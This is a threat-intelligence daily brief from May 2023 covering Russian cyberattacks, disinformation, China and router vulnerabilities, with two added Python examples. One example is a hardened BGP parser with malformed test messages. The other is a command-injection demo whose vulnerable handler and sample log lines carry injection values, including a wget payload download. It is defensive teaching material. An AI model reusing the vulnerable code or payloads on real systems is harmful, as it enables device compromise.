Daily Drop (478): Russia attacks civilian infrastructure, Don’t Invest in China, The Fight Against Russia's Fake News, Smuggler busted heading for China, China updates military conscription laws
05-03-2023
Wednesday, May 03, 2023 // (IG): BB // Financial Enabler // Coffee for Bob
Ukrainian AI company raises $1 million to fight Russian propaganda
Analyst Comments: Osavul's focus on countering disinformation and its use of LLMs to analyze the information environment aligns with the growing concern about the spread of fake news and disinformation. The company's products could be valuable for organizations seeking to understand the potential impact of a specific narrative or threat, particularly in the context of geopolitical conflicts. However, the effectiveness of LLMs in detecting and countering disinformation remains a subject of debate, and it will be important for Osavul to demonstrate the effectiveness of its approach in order to gain traction in the market.
FROM THE MEDIA: Osavul, a startup focused on information security, countering disinformation, and assessing the information environment, has raised $1 million to integrate large language models (LLMs) into its platform. The Ukrainian company's products aim to help organizations understand if a specific narrative can be viewed as a threat, what its potential impact is, and how it spreads. The firm was launched in response to the Russian invasion of Ukraine and the subsequent wave of propaganda that discredited Ukraine and its allies. The platform will integrate LLM technologies to analyze the information environment, and Osavul's co-founder has warned of the increased risk of spreading misinformation with the emergence of new technologies, such as LLMs.
READ THE STORY: Cybernews
Russia attacks civilian infrastructure in cyberspace just as it does on the ground
Analyst Comments: The assessment that 90% of the members of the hacker groups monitored by the Ukrainian Government are Russian military operatives is concerning. It underlines that the cyber conflict between Russia and Ukraine has become an integral part of the wider war, and the targeting of civilian infrastructure by Russian hackers is a worrying trend with serious consequences for Ukraine's economy and security. That CERT-UA was nonetheless able to process and repel 700 cyber incidents in just four months is a testament to the country's cyber resilience and the effectiveness of its defensive measures.
FROM THE MEDIA: The Government Cyber Emergency Response Team of Ukraine, CERT-UA, has revealed that it is monitoring the activities of over 80 hacking groups, the majority of which are from the Russian Federation, while 90% of their members are believed to be Russian military operatives. According to Volodymyr Kondrashov, the spokesman for the State Service of Special Communications and Information Protection, Russia is using the same tactics in cyberspace as it does on the conventional battlefield, attacking civilian infrastructure. In the first four months of 2023 alone, CERT-UA reportedly processed and repelled 700 cyber incidents, with a third of them being attacks on government bodies.
READ THE STORY: UKRINFORM
Don’t Bother Investing in China Unless You’re Chinese
Analyst Comments: China's decision to limit international access to its databases poses a challenge for global asset managers seeking to invest in the country's economy, and it is especially concerning given the history of fraud at Chinese companies listed on the Nasdaq. Access to basic information such as company ownership is becoming increasingly difficult for offshore investors, making it harder to assess investment opportunities in China. A team of trusted, native Chinese analysts may help investors work around this information blackout, but investing in China from afar is becoming more difficult.
FROM THE MEDIA: China has been cutting off international access to various databases, including corporate registration, patents, and official statistical yearbooks. Shanghai-based Wind Information Co., a data platform widely used by traders, has recently cut off subscriptions for foreign think tanks and research firms due to "compliance" issues, which raises eyebrows. Wind provides real-time financial information and comprehensive databases on China's economy. The move seems limited to non-financial entities such as non-profit policy research outlets, and a good analyst can still get what they need. However, it has become increasingly difficult for people offshore to find out what China or its companies are up to, even for information as irrelevant to national security as company ownership.
READ THE STORY: Bloomberg
The Fight Against Russia's Fake News in Cuba
Analyst Comments: The information war between Russia and Ukraine is not new, but its reach into Caribbean nations is noteworthy, as is the use of state media to spread disinformation about the conflict in other regions. The alliance between Radio Marti and StopFake.org is a commendable effort to counter Kremlin propaganda, but it is still unclear how effectively it reaches Cubans; because Radio Marti's website is difficult to access from inside Cuba, social media platforms such as Facebook carry much of the load. Leaked U.S. intelligence documents suggest that Russia's disinformation campaigns are highly effective and that only a small fraction of them is detected by the West, which makes sustained counter-disinformation efforts all the more important.
FROM THE MEDIA: Russian state media is battling a fact-checking site from Kyiv in an information war over Ukraine in Caribbean nations. In Cuba, Kremlin-controlled media outlets such as Russia Today, Sputnik, and RIA-Novosti have been the main providers of news content on the war in Ukraine for the country's official press. The Russian versions of events in Ukraine are being picked up by media across Latin America, with Radio Marti, a sister media organization to VOA, attempting to offer Cubans a different version of the conflict. The media organization joined forces with StopFake.org, a Ukrainian fact-checking outlet to counter Spanish-language Russian propaganda in Cuba, Latin America, and Spain.
READ THE STORY: VOA
Smuggler busted heading for China with dodgy GPUs … and live lobsters
Analyst Comments: This incident highlights cross-border shenanigans in the Pearl River Delta and underscores how US export restrictions have given rise to "evasion routes" for moving controlled technology. That said, the smuggled GPUs were outdated parts of no interest to gamers or crypto miners, and a card of that vintage falls well below the performance thresholds of the US export controls on AI accelerators, so it is unclear whether this was sanctions evasion or simply smuggling. Hong Kong authorities' commitment to cracking down on such traffic is nonetheless welcome.
FROM THE MEDIA: Hong Kong authorities intercepted a van carrying around 280 kilograms of live lobsters and 70 "high-value computer display cards" that were being smuggled into China. The goods, valued at around HK$600,000 ($76,500), were seized as the vehicle moved to enter the Hong Kong-Zhuhai-Macao Bridge. The display cards, which bore Nvidia's logo, resembled the K2200, an outdated workstation GPU that can now be purchased for about $160. Hong Kong authorities have launched an investigation into the smuggling incident.
READ THE STORY: The Register
China updates military conscription rules with an eye on space, cyberwarfare
Analyst Comments: China's decision to allow former soldiers to re-enlist and to prioritize cyberwarfare and space expertise reflects President Xi Jinping's efforts to rapidly modernize and expand China's military capabilities. The revised conscription rules aim to increase troop numbers quickly by recruiting retired military members, who will be given priority during recruitment and will likely return to their original units. The move comes amid rising tension between China and the U.S. over Taiwan, with U.S. lawmakers introducing a bill to boost cybersecurity collaboration with Taiwan. The Taiwan Cybersecurity Resiliency Act would require the U.S. Department of Defense to conduct cyber training exercises, help defend Taiwan's military networks and infrastructure, and leverage U.S. cybersecurity technologies in Taiwan's defence. The bill's sponsors note that Taiwan faces millions of cyberattacks every month originating from China, some of which are later reused against the United States.
FROM THE MEDIA: China has updated its conscription laws, allowing former soldiers to reenlist and prioritizing the recruitment of individuals with cyber and space expertise. The updated rules aim to increase troop numbers by recruiting retired military members and will focus on the country's expanding military capabilities. Chinese President Xi Jinping has pushed for the modernization of military theory, organizational forms, personnel, weaponry, and equipment, as well as enhancing the military's strategic capabilities to defend China's sovereignty, security, and development interests. The new regulations come as bipartisan lawmakers in the U.S. introduce a bill to boost cybersecurity collaboration with Taiwan to counter cyberattacks from China.
READ THE STORY: The Hill
North Korean factory poster urges cyber safety as country’s hacking threat grows
Analyst Comments: The North Korean regime has long viewed cyberspace as an important arena for global conflict and often accuses the US and its allies of mounting cyberattacks against the DPRK. Pyongyang may have a good reason for concern about cybersecurity threats, as foreign hackers have targeted critical infrastructure and virtual assets to finance the regime's nuclear and missile development. However, DPRK threat actors have also carried out cyberattacks, including targeting entities in the country. While the appearance of the cybersecurity poster may reflect an effort to improve basic cyber hygiene, the North Korean regime has been known to limit access to IT education and resources, making it uncertain how effective these efforts will be.
FROM THE MEDIA: North Korean state media aired a glimpse of domestic cybersecurity education in the country during a program about the Ryongsong Machine Complex in the northeastern city of Hamhung. A poster in the factory featured cybersecurity buzzwords and urged vigilance against malicious software, including spyware, adware, worms, and backdoors. While North Korean computer science is typically focused on top schools and elite institutions, basic IT literacy remains limited outside of these areas. The appearance of the cybersecurity poster may reflect Pyongyang's efforts to improve cyber hygiene domestically to protect key economic and military sites.
READ THE STORY: NK News
Researchers Uncover New BGP Flaws in Popular Internet Routing Protocol Software
Analyst Comments: Vulnerabilities in BGP implementations put the routing infrastructure of the internet at risk, and that infrastructure underpins everything else. Attackers could exploit these flaws to crash vulnerable BGP peers; a peer that crashes drops all of its sessions and routing tables until it recovers, and repeated malformed messages can prolong the outage. The practical prerequisite is reachability: an attacker who can spoof the source address of a trusted peer, or who has compromised a legitimate peer through other flaws or misconfigurations, can deliver the crafted OPEN message. That makes standard BGP hygiene the first line of defence while patches roll out: restrict TCP/179 to configured neighbours with ACLs, and use TCP MD5 or TCP-AO and GTSM (TTL security) so that unsolicited messages from arbitrary sources never reach the BGP parser. None of that helps against a compromised legitimate peer, so upgrading FRRouting is the only complete fix. FRRouting's use by several vendors and organizations also raises supply chain concerns, since downstream products inherit the bugs until they rebase on a fixed release. The open-source BGP Fuzzer tool released by Forescout could help organizations test their own BGP implementations for similar parsing defects.
FROM THE MEDIA: Researchers from Forescout Vedere Labs have disclosed vulnerabilities in FRRouting, an open-source implementation of the Border Gateway Protocol (BGP), found while testing version 8.4. The routing protocol suite is used by several vendors, including NVIDIA Cumulus, DENT, and SONiC, so the flaws propagate downstream as supply chain risk. The three vulnerabilities, CVE-2022-40302, CVE-2022-40318, and CVE-2022-43681, are out-of-bounds reads in the handling of BGP OPEN messages and could be exploited to crash a vulnerable peer, causing a denial-of-service (DoS) condition. An attacker could send a specially crafted, unsolicited BGP OPEN message to a target router after spoofing the IP address of a trusted peer, or after compromising a legitimate peer through other flaws or misconfigurations. Forescout has also released a Python-based open-source BGP Fuzzer tool that lets organizations test the robustness of their own BGP implementations.
READ THE STORY: THN
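As an added example (not Forescout's code and not FRRouting's), here is a minimal BGP OPEN parser in Python that demonstrates the class of check whose absence produces an out-of-bounds read: every length field carried inside the message is validated against the bytes actually received before anything is read. The layouts follow RFC 4271 (OPEN) and RFC 5492 (capabilities); the sample messages are constructed here, and the overlong length fields are the kind of mutation a fuzzer would produce.

```python
import struct
from dataclasses import dataclass, field

BGP_MARKER = b"\xff" * 16
BGP_HEADER_LEN = 19          # marker(16) + length(2) + type(1)
BGP_MAX_MSG_LEN = 4096
BGP_MSG_OPEN = 1
OPEN_FIXED_LEN = 10          # version(1) + my AS(2) + hold time(2) + BGP id(4) + opt param len(1)
OPT_PARAM_CAPABILITIES = 2


class MalformedOpen(ValueError):
    """Raised instead of reading past the end of the received buffer."""


@dataclass
class OpenMessage:
    version: int
    my_as: int
    hold_time: int
    bgp_id: str
    capabilities: list = field(default_factory=list)   # [(code, value bytes), ...]


def parse_capabilities(blob: bytes) -> list:
    """Parse a Capabilities optional parameter (RFC 5492); every read is bounded by len(blob)."""
    caps, pos = [], 0
    while pos < len(blob):
        if pos + 2 > len(blob):
            raise MalformedOpen("capability header truncated")
        code, clen = blob[pos], blob[pos + 1]
        pos += 2
        if pos + clen > len(blob):
            raise MalformedOpen(f"capability {code} claims {clen} bytes, only {len(blob) - pos} remain")
        caps.append((code, blob[pos:pos + clen]))
        pos += clen
    return caps


def parse_open(msg: bytes) -> OpenMessage:
    """Parse one BGP OPEN (RFC 4271 s4.2), rejecting any length field that overruns the buffer."""
    if len(msg) < BGP_HEADER_LEN:
        raise MalformedOpen("message shorter than BGP header")
    marker, length, mtype = msg[:16], struct.unpack("!H", msg[16:18])[0], msg[18]
    if marker != BGP_MARKER:
        raise MalformedOpen("bad marker")
    if length != len(msg) or length > BGP_MAX_MSG_LEN:
        raise MalformedOpen("header length does not match received bytes")
    if mtype != BGP_MSG_OPEN:
        raise MalformedOpen(f"not an OPEN (type {mtype})")
    body = msg[BGP_HEADER_LEN:]
    if len(body) < OPEN_FIXED_LEN:
        raise MalformedOpen("OPEN body truncated")
    version, my_as, hold_time, _bgp_id, opt_len = struct.unpack("!BHHIB", body[:OPEN_FIXED_LEN])
    if version != 4:
        raise MalformedOpen(f"unsupported BGP version {version}")
    opts = body[OPEN_FIXED_LEN:]
    if len(opts) != opt_len:
        raise MalformedOpen(f"opt param len {opt_len} but {len(opts)} bytes follow")
    caps, pos = [], 0
    while pos < len(opts):
        if pos + 2 > len(opts):
            raise MalformedOpen("optional parameter header truncated")
        ptype, plen = opts[pos], opts[pos + 1]
        pos += 2
        if pos + plen > len(opts):
            raise MalformedOpen(f"optional parameter {ptype} claims {plen} bytes, only {len(opts) - pos} remain")
        value = opts[pos:pos + plen]
        pos += plen
        if ptype == OPT_PARAM_CAPABILITIES:
            caps.extend(parse_capabilities(value))
    return OpenMessage(version, my_as, hold_time, ".".join(str(b) for b in body[5:9]), caps)


def build_open(my_as, hold_time, bgp_id, opt_params=b"", declared_opt_len=None) -> bytes:
    """Encode an OPEN; declared_opt_len lets a fuzzer lie about the optional parameter length."""
    opt_len = len(opt_params) if declared_opt_len is None else declared_opt_len
    body = struct.pack("!BHHIB", 4, my_as, hold_time, bgp_id, opt_len) + opt_params
    return BGP_MARKER + struct.pack("!HB", BGP_HEADER_LEN + len(body), BGP_MSG_OPEN) + body


def is_well_formed(msg: bytes) -> bool:
    try:
        parse_open(msg)
        return True
    except MalformedOpen:
        return False


# Constructed messages (not captures). Capability 1 = multiprotocol, AFI 1 / SAFI 1 (IPv4 unicast).
MP_IPV4_UNICAST = b"\x01\x04\x00\x01\x00\x01"
GOOD_OPEN = build_open(65001, 90, 0xC0000201, b"\x02\x06" + MP_IPV4_UNICAST)
# Fuzzer-style mutations: inner length fields larger than the bytes that actually follow.
OVERLONG_CAP = build_open(65001, 90, 0xC0000201, b"\x02\x06" + b"\x01\x40\x00\x01\x00\x01")
OVERLONG_PARAM = build_open(65001, 90, 0xC0000201, b"\x02\x20" + MP_IPV4_UNICAST)
LYING_OPT_LEN = build_open(65001, 90, 0xC0000201, b"\x02\x06" + MP_IPV4_UNICAST, declared_opt_len=40)

if __name__ == "__main__":
    print(parse_open(GOOD_OPEN))
    for name, m in [("OVERLONG_CAP", OVERLONG_CAP), ("OVERLONG_PARAM", OVERLONG_PARAM),
                    ("LYING_OPT_LEN", LYING_OPT_LEN), ("TRUNCATED", GOOD_OPEN[:-3])]:
        print(name, "well-formed:", is_well_formed(m))
```

Note that an OPEN is the first message a speaker processes after the TCP handshake, before the session reaches Established, so any host that can complete a TCP connection to port 179 gets to exercise this parser; that is why the network controls above matter as a stopgap.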
Cybercrime groups find a new target: religious institutions
Analyst Comments: The recent attacks by LockBit and Karakurt against religious organizations in the United States underscore the growing boldness of extortion groups and their willingness to target any institution that holds data worth ransoming. Religious institutions are not usually thought of as high-value targets, but they hold sensitive personal and financial records, often with thin IT and security staffing, and need the same basic protections as any other organization. Karakurt's ties to the former Conti operation also show how criminals have diversified their monetization: when an organization manages to block the encryption stage, pure data-theft extortion still yields a payday.
FROM THE MEDIA: Two hacking groups, LockBit and Karakurt, have recently claimed attacks on religious organizations in the United States. LockBit targeted Relentless Church in South Carolina, a megachurch with more than 15,000 members, stealing employee data including passports and financial documents. Karakurt claimed to have attacked Our Sunday Visitor, a Catholic publishing company, and stolen 130 gigabytes of data, including accounting documents, HR information, and financial contracts. Although it is unusual for hackers to target religious institutions, some experts say that groups typically do not have rules against attacking them but that they may avoid doing so for PR purposes. Karakurt is an extortion group that eschews ransomware and relies solely on the theft of data. The group has concrete ties to the now-defunct ransomware gang Conti.
READ THE STORY: The Record
Mirai botnet loves exploiting your unpatched TP-Link routers, CISA warns
Analyst Comments: Inclusion in CISA's Known Exploited Vulnerabilities (KEV) catalog is significant because CISA only lists flaws for which it has evidence of active exploitation, and federal agencies are then required to remediate them by a fixed deadline; it is a reasonable priority list for everyone else too. The TP-Link flaw is especially concerning because the Mirai botnet, known for large-scale DDoS attacks launched from compromised consumer devices, is already exploiting it. TP-Link has issued firmware to fix the issue, but the speed with which exploitation followed the patch illustrates how short the window between disclosure and in-the-wild exploitation has become, and consumer routers rarely update themselves, so a patch only helps the owners who apply it. The Oracle WebLogic Server flaw is easy to exploit and could allow an unauthenticated attacker with network access to compromise the server and read data on the system. The Log4j flaw, CVE-2021-45046, is less severe than Log4Shell because it only leads to RCE or information leakage in non-default logging configurations, but any deployment still on Log4j 2.15.0 remains exposed and should move to a current 2.17.x release or later.
FROM THE MEDIA: The US Cybersecurity and Infrastructure Security Agency (CISA) has added three flaws to its Known Exploited Vulnerabilities catalog, including one in TP-Link routers that is being targeted by the Mirai botnet. The other two affect Oracle's WebLogic Server and the Apache Software Foundation's Log4j Java logging library. The TP-Link flaw, tracked as CVE-2023-1389 and affecting the Archer AX21 router, is a command injection in the device's web management interface that leads to remote code execution, letting an attacker take control of the device from the local network or, where management is exposed, from the internet. Mirai began exploiting it primarily against devices in Eastern Europe, and the campaign soon expanded beyond that region. The Oracle WebLogic Server flaw, CVE-2023-21839, affects versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 and could allow an unauthenticated attacker with network access to compromise the server and gain access to data on the system. The Log4j flaw, CVE-2021-45046, is a remote code execution issue distinct from Log4Shell (CVE-2021-44228): it arose because the initial Log4Shell fix in Log4j 2.15.0 was incomplete, and it was addressed in 2.16.0.
READ THE STORY: The Register
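The TP-Link bug is a command injection, so as an added illustration (not TP-Link's firmware code and not the CVE-2023-1389 exploit) here is a Python sketch of the general pattern: a hypothetical router web handler that applies a region setting by interpolating a request parameter into a shell command, the hardened form that allow-lists the value and never invokes a shell, and a small detector that flags shell metacharacters in request parameters from constructed web-server access-log lines. The `/cgi/locale` path, the `region` parameter, the `echo` stand-in for the real system command and the log lines are all assumptions made for the example.

```python
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Hypothetical handler for a router web form that applies a region/locale setting.
# "echo" stands in for whatever system command the firmware would really run.


def apply_region_vulnerable(region: str) -> str:
    """Anti-pattern: untrusted request data interpolated into a shell command line."""
    cmd = f"echo region={region}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


REGION_RE = re.compile(r"[A-Z]{2}")   # ISO 3166-style two-letter code; assumed format


def validate_region(region: str) -> bool:
    """Allow-list: only a value of the expected shape is ever used."""
    return REGION_RE.fullmatch(region) is not None


def run_region_argv(region: str) -> str:
    """No shell: the value is a single argv element, so ';', '|' and '$(...)' are inert text."""
    return subprocess.run(["echo", f"region={region}"], capture_output=True, text=True).stdout.strip()


def apply_region_hardened(region: str) -> str:
    """Defence in depth: reject anything outside the allow-list, then run without a shell."""
    if not validate_region(region):
        raise ValueError("region rejected by allow-list")
    return run_region_argv(region)


SHELL_META = re.compile(r"[;&|`$\n]")   # checked after URL-decoding


def flag_injection_attempts(log_lines):
    """Return (parameter, decoded value) pairs whose value carries shell metacharacters."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if SHELL_META.search(value):
                    hits.append((name, value))
    return hits


# Constructed access-log lines in common log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/May/2023:10:00:01 +0000] "GET /cgi/locale?region=US HTTP/1.1" 200 42',
    '198.51.100.9 - - [01/May/2023:10:00:02 +0000] "GET /cgi/locale?region=US%3Bwget%20http%3A%2F%2F198.51.100.9%2Fbot.sh HTTP/1.1" 200 42',
    '198.51.100.9 - - [01/May/2023:10:00:03 +0000] "POST /cgi/locale?region=$(id) HTTP/1.1" 200 42',
]

if __name__ == "__main__":
    payload = "US; echo INJECTED"
    print("vulnerable :", repr(apply_region_vulnerable(payload)))
    print("argv only  :", repr(run_region_argv(payload)))
    print("allow-list :", validate_region(payload), validate_region("US"))
    for hit in flag_injection_attempts(SAMPLE_LOG):
        print("flagged    :", hit)
```

The detector decodes the query before matching, because the interesting payloads arrive percent-encoded; it is a triage aid for a SOC looking for Mirai-style spraying, not a substitute for patching the device.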